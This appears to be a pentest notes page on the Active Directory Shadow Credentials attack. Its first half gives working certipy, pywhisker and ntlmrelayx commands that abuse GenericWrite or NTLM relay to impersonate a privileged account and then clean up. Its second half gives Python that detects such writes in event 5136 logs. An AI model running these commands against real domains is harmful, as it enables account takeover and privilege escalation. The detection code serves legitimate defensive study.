Shadow Credentials

05.06.2024 · dadevel

It is possible to add Key Credentials to the msDS-KeyCredentialLink attribute of the target user or computer object and then perform Kerberos authentication as that account using PKINIT (source).

Shadow Credentials require Windows Server 2016 domain functional level or higher.

Abuse GenericWrite on a user object (jdoeadm) to add a key credential and retrieve a certificate. Now you can authenticate as the user via PKINIT. If you have GenericWrite on a computer object instead, you can impersonate a domain admin on that computer through Delegate2Thyself / S4U2self.

Add a new key credential, authenticate via PKINIT, UnPAC-the-hash and remove the key credential in one go (certipy). pywhisker only adds the key credential and writes out the certificate; it needs the cleanup step below.

certipy shadow auto -u jdoe@corp.local -p 'passw0rd' -account jdoeadm
pywhisker -v -d corp.local -u jdoe -k --no-pass -t jdoeadm --action add -P ''

Clean up.

The device UUID ($uuid) is printed by the add command above.

pywhisker -d corp.local -u jdoe -k --no-pass -t jdoeadm --action remove --device-id $uuid
certipy shadow remove -u jdoe@corp.local -p 'passw0rd' -account jdoeadm -device-id $uuid

NTLM relay to LDAP and open an interactive LDAP shell (source). When relaying a computer account the shadow target should be the SAM account name, e.g. ws01$.

Requires PR 1402.

impacket-ntlmrelayx --no-dump --no-da --no-acl --no-validate-privs --no-smb-server --no-wcf-server --no-raw-server --http-port 8080 --interactive --target ldaps://dc01.corp.local
$ nc -v 127.0.0.1 11000
# set_shadow_creds jdoeadm
# clear_shadow_creds jdoeadm
# exit

NTLM relay to LDAP. Requires manual cleanup.

impacket-ntlmrelayx --no-dump --no-da --no-acl --no-validate-privs --no-smb-server --no-wcf-server --no-raw-server --http-port 8080 --shadow-credentials --shadow-target jdoeadm --target ldaps://dc01.corp.local
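Both the pywhisker/certipy commands above and the ntlmrelayx shadow-credentials relay end in the same directory write: a new value on msDS-KeyCredentialLink of the target. The defender-side counterpart is auditing that write. The following is an added example, not part of these notes or of any of the tools mentioned: it reads Windows Security event 5136 (directory service object modified) records, keeps the ones that add a value to msDS-KeyCredentialLink, decodes the KEYCREDENTIALLINK_BLOB (MS-ADTS 2.2.20) to recover the KeyID, key source, creation time and the DeviceId that the cleanup step needs, and flags writes made by a principal other than the account itself. The event records are constructed JSON lines using the field names of event 5136; the "self-write" heuristic (writer's sAMAccountName equals the target's leading RDN) is an assumption, as is that 5136 auditing with a SACL on the attribute is enabled in the first place.

```python
"""Audit Security event 5136 records for writes to msDS-KeyCredentialLink and
decode the KEYCREDENTIALLINK_BLOB that was written (MS-ADTS 2.2.20).
Added example, not part of the original notes; all sample events are constructed."""
import json
import struct
import uuid
from datetime import datetime, timedelta, timezone

VALUE_ADDED = "%%14674"  # event 5136 OperationType for "Value Added"

# KEYCREDENTIALLINK_ENTRY identifiers (MS-ADTS 2.2.20.6)
ENTRY_KEY_ID = 0x01         # SHA-256 of the public key
ENTRY_KEY_SOURCE = 0x05     # 0x00 = key stored in AD
ENTRY_DEVICE_ID = 0x06      # 16-byte GUID, the id pywhisker/certipy print for cleanup
ENTRY_CREATION_TIME = 0x09  # FILETIME

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_datetime(ft: int) -> datetime:
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)

def datetime_to_filetime(dt: datetime) -> int:
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10

def parse_dn_binary(value: str) -> bytes:
    """Extract the blob from the LDAP DN-binary form 'B:<hexlen>:<hex>:<DN>'."""
    parts = value.split(":", 3)
    if len(parts) != 4 or parts[0] != "B" or int(parts[1]) != len(parts[2]):
        raise ValueError("not a DN-binary value")
    return bytes.fromhex(parts[2])

def parse_key_credential_link(blob: bytes) -> dict:
    """Walk the length/identifier/value entries of a KEYCREDENTIALLINK_BLOB."""
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != 0x200:
        raise ValueError(f"unexpected blob version {version:#x}")
    pos, out = 4, {}
    while pos + 3 <= len(blob):
        length, ident = struct.unpack_from("<HB", blob, pos)
        data = blob[pos + 3:pos + 3 + length]
        pos += 3 + length
        if ident == ENTRY_KEY_ID:
            out["key_id"] = data.hex()
        elif ident == ENTRY_KEY_SOURCE:
            out["key_source"] = data[0]
        elif ident == ENTRY_DEVICE_ID:
            out["device_id"] = str(uuid.UUID(bytes_le=data))
        elif ident == ENTRY_CREATION_TIME:
            out["created"] = filetime_to_datetime(struct.unpack("<Q", data)[0])
    return out

def audit_5136_events(lines) -> list:
    """One finding per value added to msDS-KeyCredentialLink.
    Flagged when the writing principal is not the account that owns the attribute:
    device enrolment writes as the account itself (WS01$ onto CN=WS01), while the
    GenericWrite abuse writes as someone else (jdoe onto CN=jdoeadm).
    Assumption: the leading RDN of the object equals its sAMAccountName."""
    findings = []
    for line in lines:
        ev = json.loads(line)
        if (ev.get("AttributeLDAPDisplayName") != "msDS-KeyCredentialLink"
                or ev.get("OperationType") != VALUE_ADDED):
            continue
        owner = ev["ObjectDN"].split(",", 1)[0].split("=", 1)[1]
        writer = ev["SubjectUserName"]
        entry = parse_key_credential_link(parse_dn_binary(ev["AttributeValue"]))
        findings.append({
            "writer": writer,
            "target": ev["ObjectDN"],
            "device_id": entry.get("device_id"),
            "created": entry.get("created"),
            "suspicious": writer.rstrip("$").lower() != owner.lower(),
        })
    return findings

# --- constructed sample data (not real domain data) ---------------------------
def build_blob(key_id: bytes, device_id: uuid.UUID, created: datetime) -> bytes:
    def entry(ident, data):
        return struct.pack("<HB", len(data), ident) + data
    return (struct.pack("<I", 0x200)
            + entry(ENTRY_KEY_ID, key_id)
            + entry(ENTRY_KEY_SOURCE, b"\x00")
            + entry(ENTRY_DEVICE_ID, device_id.bytes_le)
            + entry(ENTRY_CREATION_TIME, struct.pack("<Q", datetime_to_filetime(created))))

def dn_binary(blob: bytes, dn: str) -> str:
    h = blob.hex().upper()
    return f"B:{len(h)}:{h}:{dn}"

SAMPLE_DEVICE_ID = uuid.UUID("0f1e2d3c-4b5a-6978-8796-a5b4c3d2e1f0")
SAMPLE_CREATED = datetime(2024, 6, 5, 12, 0, tzinfo=timezone.utc)
SAMPLE_BLOB = build_blob(bytes(range(32)), SAMPLE_DEVICE_ID, SAMPLE_CREATED)

def sample_event(subject, object_dn, attribute, value):
    return json.dumps({"EventID": 5136, "SubjectUserName": subject, "ObjectDN": object_dn,
                       "AttributeLDAPDisplayName": attribute, "AttributeValue": value,
                       "OperationType": VALUE_ADDED})

JDOEADM_DN = "CN=jdoeadm,CN=Users,DC=corp,DC=local"
WS01_DN = "CN=WS01,CN=Computers,DC=corp,DC=local"
SAMPLE_EVENTS = [
    sample_event("jdoe", JDOEADM_DN, "msDS-KeyCredentialLink", dn_binary(SAMPLE_BLOB, JDOEADM_DN)),
    sample_event("WS01$", WS01_DN, "msDS-KeyCredentialLink", dn_binary(SAMPLE_BLOB, WS01_DN)),
    sample_event("jdoe", "CN=jdoe,CN=Users,DC=corp,DC=local", "description", "unrelated change"),
]

if __name__ == "__main__":
    for finding in audit_5136_events(SAMPLE_EVENTS):
        print(finding)
```

The decoded device_id is the same GUID that the remove commands above take as $uuid, so a finding can be matched against a later "Value Deleted" event (OperationType %%14675) to confirm cleanup actually happened; a flagged add with no matching delete is the case worth escalating.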
